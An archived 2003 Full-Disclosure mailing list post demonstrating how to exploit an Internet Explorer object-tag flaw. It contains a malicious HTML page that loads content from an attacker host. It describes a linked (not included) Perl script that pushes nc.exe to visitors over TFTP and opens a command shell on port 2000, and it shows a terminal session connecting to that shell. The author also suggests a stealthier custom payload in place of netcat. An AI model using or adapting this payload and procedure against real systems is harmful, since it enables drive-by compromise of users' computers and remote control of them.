lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030822010715.P2662-100000@redknuckle.sensepost.com> From: roelof at sensepost.com (Roelof Temmingh) Subject: AD20030820...testing made easy eEye IE (EIIE:)) bug: http://www.eeye.com/html/Research/Advisories/AD20030820.html This here just making it easier to edit commands/play around ...nothing heavy...nothing new... On 10.10.10.10's web server is test.html: ----------------------------------------- <html><h1> nice webpage</h1> <object data="http://10.10.10.10:81/blah.html"> </object></html> On 10.10.10.10 ... running as root: ----------------------------------- PERL script located on http://www.sensepost.com/misc/eEye-SP.pl Not listed/attached here ... AVs will bitch etc. etc. When/if victim surfs to http://10.10.10.10/test.html it's off to port 81. nc.exe will be TFTP-ed and CMD.EXE shell spawned on port 2000...see the WSH part. It goes like this: ------------------ # perl eEye-SP.pl [Server accepting clients] (Victim surfs to test.html on 10.10.10.10...) incoming...192.168.0.1 incoming...192.168.0.1 ^C # telnet 192.168.0.1 2000 Trying 192.168.0.1... Connected to blah.pSSSofff.com. Escape character is '^]'. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> Of course the idea is not to tftp nc.exe...but your own home grown thingy..(ideally without a console window:))... 'later.. Roelof